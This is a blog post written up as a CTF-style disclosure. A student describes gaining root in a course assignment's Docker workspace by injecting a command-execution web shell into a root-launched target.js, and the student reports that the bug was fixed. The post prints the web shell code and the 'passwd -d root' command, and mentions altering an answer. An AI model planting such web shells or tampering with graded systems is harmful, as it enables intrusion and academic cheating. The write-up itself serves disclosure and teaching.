<!DOCTYPE html><html data-astro-transition-scope="astro-nfpogox7-1" lang="zh-CN"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="stylesheet" href="/fonts/maple-mono/normal-nl/regular/font.css"><link rel="stylesheet" href="/fonts/maple-mono/normal-nl/bold/font.css"><link rel="icon" href="/favicon.ico?v=2" sizes="16x16 32x32 48x48"><link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32.png?v=2"><link rel="icon" type="image/png" sizes="512x512" href="/icons/favicon.png?v=2"><link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png?v=2"><link rel="sitemap" href="/sitemap-index.xml"><link rel="alternate" type="application/rss+xml" title="Aynakeya" href="/rss.xml"><link rel="canonical" href="https://www.aynakeya.com/blog/posts/unintended-root-privilege-escalation-in-cybersecurity-class-assignment/"><meta name="generator" content="Astro v7.3.3"><title>Getting root access on cpsc436s assignment workspace | Aynakeya</title><meta name="description" content="tl;drI found a privilegee escalation vulnerability in one of my course's assignment. I've reported the vulnerability to our instructor, and he fixed it. yaayy. This article will be"><meta property="og:type" content="article"><meta property="og:title" content="Getting root access on cpsc436s assignment workspace | Aynakeya"><meta property="og:description" content="tl;drI found a privilegee escalation vulnerability in one of my course's assignment. I've reported the vulnerability to our instructor, and he fixed it. yaayy. This article will be"><meta property="og:url" content="https://www.aynakeya.com/blog/posts/unintended-root-privilege-escalation-in-cybersecurity-class-assignment/"><meta property="og:image" content="https://www.aynakeya.com/images/avatar.jpg"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="Getting root access on cpsc436s assignment workspace | Aynakeya"><meta name="twitter:description" content="tl;drI found a privilegee escalation vulnerability in one of my course's assignment. I've reported the vulnerability to our instructor, and he fixed it. yaayy. This article will be"><meta name="twitter:image" content="https://www.aynakeya.com/images/avatar.jpg"><script>
  (() => {
    function applyTheme() {
      const savedTheme = localStorage.getItem('theme');
      const themePreference = savedTheme === 'light' || savedTheme === 'dark' ? savedTheme : 'system';
      document.documentElement.dataset.themePreference = themePreference;
      document.documentElement.dataset.theme = themePreference === 'system'
        ? (matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light')
        : themePreference;
    }
    applyTheme();
    document.addEventListener('astro:after-swap', applyTheme);
  })();
</script><meta name="astro-view-transitions-enabled" content="true"><meta name="astro-view-transitions-fallback" content="swap"><script type="module" src="/_astro/ClientRouter.astro_astro_type_script_index_0_lang.CYDbzu1r.js"></script><link rel="stylesheet" href="/_astro/BaseLayout.9DX1KRRl.css"><link rel="stylesheet" href="/_astro/katex.BWPgQq51.css"><style>[data-astro-transition-scope="astro-nfpogox7-1"] { view-transition-name: astro-nfpogox7-1; }@layer astro { ::view-transition-old(astro-nfpogox7-1) { animation: none; opacity: 0; mix-blend-mode: normal; }::view-transition-new(astro-nfpogox7-1) { animation: none; mix-blend-mode: normal; }::view-transition-group(astro-nfpogox7-1) { animation: none } }[data-astro-transition-fallback="old"] [data-astro-transition-scope="astro-nfpogox7-1"],
			[data-astro-transition-fallback="old"][data-astro-transition-scope="astro-nfpogox7-1"] { animation: none; mix-blend-mode: normal; }[data-astro-transition-fallback="new"] [data-astro-transition-scope="astro-nfpogox7-1"],
			[data-astro-transition-fallback="new"][data-astro-transition-scope="astro-nfpogox7-1"] { animation: none; mix-blend-mode: normal; }</style></head><body id="top"><a class="skip-link" href="#content">Skip to content</a><header class="site-header"><div class="header-inner"><a class="brand" href="/" aria-label="Aynakeya home"><img src="/icons/favicon.png" alt="" width="32" height="32"><span>Aynakeya</span></a><nav class="site-nav" aria-label="Main navigation"><a href="/"><svg class="icon" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="m3 10 9-7 9 7M5 9v11h5v-6h4v6h5V9"></path></svg><span>Home</span></a><a href="/blog/" aria-current="page"><svg class="icon" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M14 4H5v16h14v-9M9 15l1-4L19 2l3 3-9 9-4 1Z"></path></svg><span>Writing</span></a><a href="/bookmarks/"><svg class="icon" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M6 3h12v18l-6-4-6 4V3Z"></path></svg><span>Bookmarks</span></a><a href="/ctf-writeup/"><svg class="icon" width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M3 3h18v5H3V3ZM5 8v13h14V8M10 12h4"></path></svg><span>CTF</span></a></nav><div class="header-tools"><a class="icon-button" href="/search/" aria-label="搜索全站" title="搜索全站"><svg class="icon" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M21 21l-5-5M18 10a8 8 0 1 1-16 0 8 8 0 0 1 16 0Z"></path></svg></a><button class="icon-button" id="theme-toggle" type="button" aria-label="当前：跟随系统；切换到浅色模式" title="当前：跟随系统；切换到浅色模式"><span data-theme-icon="light" hidden><svg class="icon" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M12 2v2m0 16v2M2 12h2m16 0h2M5 5l1.5 1.5m11 11L19 19M5 19l1.5-1.5m11-11L19 5M17 12a5 5 0 1 1-10 0 5 5 0 0 1 10 0Z"></path></svg></span><span data-theme-icon="dark" hidden><svg class="icon" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M20.9 13A9 9 0 0 1 11 3.1 9 9 0 1 0 20.9 13Z"></path></svg></span><span data-theme-icon="system"><svg class="icon" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M3 4h18v13H3V4ZM12 17v4M8 21h8"></path></svg></span></button></div></div></header><script type="module">var e=document.documentElement,t=matchMedia(`(prefers-color-scheme: dark)`),n={light:{label:`浅色模式`,next:`dark`},dark:{label:`深色模式`,next:`system`},system:{label:`跟随系统`,next:`light`}};function r(){let r=e.dataset.themePreference;e.dataset.theme=r===`system`?t.matches?`dark`:`light`:r;let i=document.querySelector(`#theme-toggle`),a=i.querySelectorAll(`[data-theme-icon]`),o=n[r],s=`当前：${o.label}；切换到${n[o.next].label}`;i.setAttribute(`aria-label`,s),i.title=s,a.forEach(e=>{e.hidden=e.dataset.themeIcon!==r})}r(),document.addEventListener(`astro:after-swap`,r),document.addEventListener(`click`,t=>{if(!(t.target instanceof Element)||!t.target.closest(`#theme-toggle`))return;let i=n[e.dataset.themePreference].next;e.dataset.themePreference=i,localStorage.setItem(`theme`,i),r()}),t.addEventListener(`change`,()=>{e.dataset.themePreference===`system`&&r()});</script><div class="site-shell"><aside class="site-sidebar" aria-label="个人信息与文章目录"><section class="profile-card card panel" aria-label="About Aynakeya"><a class="profile-avatar" href="/" aria-label="Aynakeya home"><img src="/images/avatar.jpg" alt="Aynakeya 的头像" width="208" height="208"></a><div class="profile-identity"><p class="profile-name">Aynakeya</p><p class="profile-interests">相信的心就是你的魔法</p><div class="social-links"><a class="chip" href="https://github.com/aynakeya">GitHub</a><a class="chip" href="mailto:aynakeya.official@gmail.com">Email</a><a class="chip" href="https://space.bilibili.com/10003632">Bilibili</a></div></div><div class="site-stats"><a href="/blog/archives/"><strong>121</strong><span>文章</span></a><a href="/blog/categories/"><strong>16</strong><span>分类</span></a><a href="/blog/tags/"><strong>101</strong><span>标签</span></a></div></section><details class="toc card" open><summary>文章目录</summary><nav aria-label="Table of contents"><ol><li style="--depth: 0"><a href="#tldr">tl;dr</a></li><li style="--depth: 0"><a href="#intro">Intro</a></li><li style="--depth: 0"><a href="#adventure">Adventure</a></li><li style="--depth: 1"><a href="#investigating-the-bug">Investigating the bug</a></li><li style="--depth: 1"><a href="#testing-my-theory">Testing my theory</a></li><li style="--depth: 1"><a href="#getting-the-rce">Getting the rce</a></li><li style="--depth: 1"><a href="#playing-around-with-root-privileges">Playing around with root privileges</a></li><li style="--depth: 1"><a href="#conclusion">Conclusion</a></li><li style="--depth: 0"><a href="#some-thought">Some thought</a></li></ol></nav></details><script type="module">var e=matchMedia(`(max-width: 800px)`);function t(){let t=document.querySelector(`.toc`);t&&(t.open=!e.matches)}t(),document.addEventListener(`astro:after-swap`,t),e.addEventListener(`change`,t);</script></aside><div class="site-main"><main id="content" tabindex="-1"><article class="card paper article-page"><header class="post-header"><a class="eyebrow" href="/blog/">&larr; 返回文章列表</a><h1>Getting root access on cpsc436s assignment workspace</h1><div class="post-meta"><time datetime="2024-02-09T19:08:57.000Z">2024-02-10</time><a href="/blog/categories/ctf/">CTF</a></div></header><div class="prose"><p><a id="tl-dr"></a></p>
<h1 id="tldr">tl;dr</h1>
<p>I found a privilegee escalation vulnerability in one of my course's assignment.</p>
<p>I've reported the vulnerability to our instructor, and he fixed it.  yaayy.</p>
<p>This article will be about how I found this vulnerability and how I utilized it to get a root shell.</p>
<p><a id="Intro"></a></p>
<h1 id="intro">Intro</h1>
<p>This term, I took a new course - CPSC 436S (Topic In Cybersecurity) taught by Prof. Robert Xiao.</p>
<p>Considering it is the first time this course is being taught and the nature of cybersecurity. I was expecting that there would be lot of vulnerability I'm able to play around with and use in the assignments.</p>
<p>Here we go. One question in module 4 actually has a vulnerability.</p>
<p><a id="Adventure"></a></p>
<h1 id="adventure">Adventure</h1>
<p><a id="Investigating-the-bug"></a></p>
<h2 id="investigating-the-bug">Investigating the bug</h2>
<p>Our questions are hosted on PrairieLearn workspace. In short, the workspace is just a Docker container that contains the question and its setup.</p>
<p>I got stuck when doing the last question about DOSing a server with a rate limiter. (Later, I found it is because I'm sending requests from my computer, but PrairieLearn itself has a rate limiter, so making requests outside the container will be blocked by PrairieLearn.)</p>
<p>So, instead of trying to figure out what causes the problem, I decided to play around with the container itself.</p>
<p>According to the question description,  the container hosts an HTTP service on  <code>localhost:80</code>.</p>
<p>So. i decided to run a ps command to see what processes are running.</p>
<p><img alt="Screenshot_20240203_211543" loading="lazy" decoding="async" width="943" height="213" src="/_astro/Screenshot_20240203_211543.Pe0pDwaf_Z2gemFQ.webp"></p>
<p>huh, seems like there are some interesting processes we can look at.</p>
<p>Although we cannot read those files, after doing a <code>ls -al</code>  on those directories, I found that all of those files were owned by the current user, which means I can change the permissions of those files to whatever I want using chmod.</p>
<p><img alt="image-20240210033553234" loading="lazy" decoding="async" width="395" height="187" src="/_astro/image-20240210033553234.DASL6Qm-_Z2kLEAW.webp"></p>
<p>After changing their permissions and dumping file content, I figured out how these services are set up.</p>
<p>Firstly, the current user cpsc executes server.js.</p>
<p>Then in server.js, it will generate a new flag file by calling</p>
<pre class="astro-code astro-code-themes github-light github-dark" style="background-color:#fff;--shiki-dark-bg:#24292e;color:#24292e;--shiki-dark:#e1e4e8; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="javascript"><code><span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">child_process.</span><span style="color:#6F42C1;--shiki-dark:#B392F0">exec</span><span style="color:#24292E;--shiki-dark:#E1E4E8">(</span><span style="color:#032F62;--shiki-dark:#9ECBFF">'sudo /.init-flag.js'</span><span style="color:#24292E;--shiki-dark:#E1E4E8">);</span></span></code></pre>
<p>(The sudoers config file specifies cpsc can execute <code>/.init-flag.js</code> with root privileges without a password, so it works.)</p>
<p>Finally <code>/.init-flag.js</code> will launch another http service <code>target.js</code> with root privilege.</p>
<p>Now all services are up.</p>
<p><a id="Testing-my-theory"></a></p>
<h2 id="testing-my-theory">Testing my theory</h2>
<p>wait minute. <code>/.init-flag.js</code> will launch a js file, which is controlled by us???</p>
<p>Does that mean if we can inject some code before <code>target.js</code> is loaded, we are basically getting an rce?</p>
<p>To test my idea, I first test if our file will be kept after container is restarted.</p>
<p>I put some random character in a file called <code>a.txt</code>. then I reboot the container.</p>
<p><img alt="Screenshot_20240210_035350" loading="lazy" decoding="async" width="724" height="231" src="/_astro/Screenshot_20240210_035350.CDJ9Plbv_1Rr3qg.webp"></p>
<p>Nice. they actually keep my modifications.</p>
<p><img alt="image-20240210035450884" loading="lazy" decoding="async" width="369" height="129" src="/_astro/image-20240210035450884.BEsNw1xS_22CPi5.webp"></p>
<p>now its time to inject some malicious code into <code>target.js</code></p>
<p><a id="Getting-the-rce"></a></p>
<h2 id="getting-the-rce">Getting the rce</h2>
<p>since <code>target.js</code> uses express to host a http server. I inject the following code into <code>target.js</code> to get an rce.</p>
<pre class="astro-code astro-code-themes github-light github-dark" style="background-color:#fff;--shiki-dark-bg:#24292e;color:#24292e;--shiki-dark:#e1e4e8; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="javascript"><code><span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">app.</span><span style="color:#6F42C1;--shiki-dark:#B392F0">get</span><span style="color:#24292E;--shiki-dark:#E1E4E8">(</span><span style="color:#032F62;--shiki-dark:#9ECBFF">'/cmd'</span><span style="color:#24292E;--shiki-dark:#E1E4E8">, </span><span style="color:#D73A49;--shiki-dark:#F97583">async</span><span style="color:#24292E;--shiki-dark:#E1E4E8"> (</span><span style="color:#E36209;--shiki-dark:#FFAB70">req</span><span style="color:#24292E;--shiki-dark:#E1E4E8">, </span><span style="color:#E36209;--shiki-dark:#FFAB70">res</span><span style="color:#24292E;--shiki-dark:#E1E4E8">) </span><span style="color:#D73A49;--shiki-dark:#F97583">=></span><span style="color:#24292E;--shiki-dark:#E1E4E8"> {</span></span>
<span class="line"><span style="color:#D73A49;--shiki-dark:#F97583">    const</span><span style="color:#005CC5;--shiki-dark:#79B8FF"> command</span><span style="color:#D73A49;--shiki-dark:#F97583"> =</span><span style="color:#24292E;--shiki-dark:#E1E4E8"> req.query.cmd;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">    child_process.</span><span style="color:#6F42C1;--shiki-dark:#B392F0">exec</span><span style="color:#24292E;--shiki-dark:#E1E4E8">(command, (</span><span style="color:#E36209;--shiki-dark:#FFAB70">error</span><span style="color:#24292E;--shiki-dark:#E1E4E8">, </span><span style="color:#E36209;--shiki-dark:#FFAB70">stdout</span><span style="color:#24292E;--shiki-dark:#E1E4E8">, </span><span style="color:#E36209;--shiki-dark:#FFAB70">stderr</span><span style="color:#24292E;--shiki-dark:#E1E4E8">) </span><span style="color:#D73A49;--shiki-dark:#F97583">=></span><span style="color:#24292E;--shiki-dark:#E1E4E8"> {</span></span>
<span class="line"><span style="color:#D73A49;--shiki-dark:#F97583">        if</span><span style="color:#24292E;--shiki-dark:#E1E4E8"> (error) {</span></span>
<span class="line"><span style="color:#D73A49;--shiki-dark:#F97583">            return</span><span style="color:#24292E;--shiki-dark:#E1E4E8"> res.</span><span style="color:#6F42C1;--shiki-dark:#B392F0">send</span><span style="color:#24292E;--shiki-dark:#E1E4E8">(</span><span style="color:#032F62;--shiki-dark:#9ECBFF">`Error: ${</span><span style="color:#24292E;--shiki-dark:#E1E4E8">error</span><span style="color:#032F62;--shiki-dark:#9ECBFF">.</span><span style="color:#24292E;--shiki-dark:#E1E4E8">message</span><span style="color:#032F62;--shiki-dark:#9ECBFF">}`</span><span style="color:#24292E;--shiki-dark:#E1E4E8">);</span></span>
<span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">        }</span></span>
<span class="line"><span style="color:#D73A49;--shiki-dark:#F97583">        if</span><span style="color:#24292E;--shiki-dark:#E1E4E8"> (stderr) {</span></span>
<span class="line"><span style="color:#D73A49;--shiki-dark:#F97583">            return</span><span style="color:#24292E;--shiki-dark:#E1E4E8"> res.</span><span style="color:#6F42C1;--shiki-dark:#B392F0">send</span><span style="color:#24292E;--shiki-dark:#E1E4E8">(</span><span style="color:#032F62;--shiki-dark:#9ECBFF">`Stderr: ${</span><span style="color:#24292E;--shiki-dark:#E1E4E8">stderr</span><span style="color:#032F62;--shiki-dark:#9ECBFF">}`</span><span style="color:#24292E;--shiki-dark:#E1E4E8">);</span></span>
<span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">        }</span></span>
<span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">        res.</span><span style="color:#6F42C1;--shiki-dark:#B392F0">send</span><span style="color:#24292E;--shiki-dark:#E1E4E8">(</span><span style="color:#032F62;--shiki-dark:#9ECBFF">`Output: ${</span><span style="color:#24292E;--shiki-dark:#E1E4E8">stdout</span><span style="color:#032F62;--shiki-dark:#9ECBFF">}`</span><span style="color:#24292E;--shiki-dark:#E1E4E8">);</span></span>
<span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">    });</span></span>
<span class="line"><span style="color:#24292E;--shiki-dark:#E1E4E8">});</span></span></code></pre>
<p>I restarted the server and tried to run a command.</p>
<p><img alt="img" loading="lazy" decoding="async" width="697" height="211" src="/_astro/Screenshot_20240202_152622.BUFBwA_t_gjob5.webp"></p>
<p><a id="Playing-around-with-root-privileges"></a></p>
<h2 id="playing-around-with-root-privileges">Playing around with root privileges</h2>
<p>After getting an RCE with root access, I can simply remove the password of root using <code>passwd -d root</code> and switch to root in the webshell</p>
<p>With this root access, I can do a lot of interesting things, for example, change the answer to a custom string.</p>
<p><img alt="img" loading="lazy" decoding="async" width="803" height="137" src="/_astro/Screenshot_20240202_164206.BJy-iXik_1jnMh1.webp"></p>
<p><a id="Conclusion"></a></p>
<h2 id="conclusion">Conclusion</h2>
<p>This bug is mainly caused by misconfiguration in permission control. Which leads to privilege escalation.</p>
<p>owo ovo uwu</p>
<p><a id="Some-thought"></a></p>
<h1 id="some-thought">Some thought</h1>
<p>even experienced people can make mistake or have flaws when writing codes.</p>
<p>So testing is very important.</p>
<p>put some chatgpt generated text for conclusion</p></div><footer class="post-tags"><a class="chip" href="/blog/tags/classpwn/">#classpwn</a><a class="chip" href="/blog/tags/privilege-escalation/">#privilege escalation</a></footer><nav class="post-navigation" aria-label="Adjacent posts"><div><a href="/blog/posts/diary20240209/"><span class="eyebrow">Older</span>diary20240209</a></div><div><a href="/blog/posts/go-embed-with-underscore/"><span class="eyebrow">Newer</span>如何在go embed中包含有下划线(_)的文件 + Gin SPA</a></div></nav></article></main><footer class="site-footer card"><span>&copy; 2026 Aynakeya</span><div><a href="/rss.xml">RSS</a><a href="/blog/archives/">Archives</a><a href="#top">Back to top &uarr;</a></div></footer></div></div></body></html>